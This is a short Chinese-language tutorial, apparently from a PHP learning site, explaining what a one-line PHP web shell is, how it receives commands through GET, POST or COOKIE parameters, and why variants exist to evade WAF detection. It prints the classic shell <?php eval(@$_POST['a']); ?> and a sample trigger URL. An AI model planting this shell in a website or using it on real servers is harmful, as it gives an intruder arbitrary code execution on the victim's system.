php小馬是什麼?
php小馬也就是一句話木馬,就是指只需要一行程式碼的木馬,短短一行程式碼,就能做到和大馬相當的功能。為了繞過waf的偵測,一句話木馬出現了無數中變形,但本質是不變的:木馬的函數執行了我們發送的命令。
我們如何發送命令,發送的命令如何執行?
我們可以透過GET 、POST 、COOKIE這三種方式向一個網站提交數據,一句話木馬用$_GET[' ']、$_POST[' ']、$_COOKIE[' ' ] 接收我們傳遞的數據,並把接收的數據傳遞給一句話木馬中執行命令的函數,進而執行命令。
所以看到的經典一句話木馬大多都是只有兩個部分,一個是可以執行程式碼的函數部分,一個是接收資料的部分。
例如:
<?php eval(@$_POST['a']); ?>
其中eval就是執行指令的函數,$_POST['a']就是接收的資料。 eval函數把接收的資料當作PHP程式碼來執行。這樣我們就能夠讓插入了一句話木馬的網站執行我們傳遞過去的任意PHP語句。這便是一句話木馬的強大之處。
範例:
因為木馬是接收post請求中「a」 的資料( $_POST['a']),所以我們必須以post方法發送資料並且將我們要執行的程式碼賦值給“a”。如果把木馬中的post替換成get,那麼我麼就需要以GET方法發送“a”,( 就像這樣:http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。
更多PHP知識,請造訪PHP中文網!
以上是php小馬是什麼的詳細內容。更多資訊請關注PHP中文網其他相關文章!
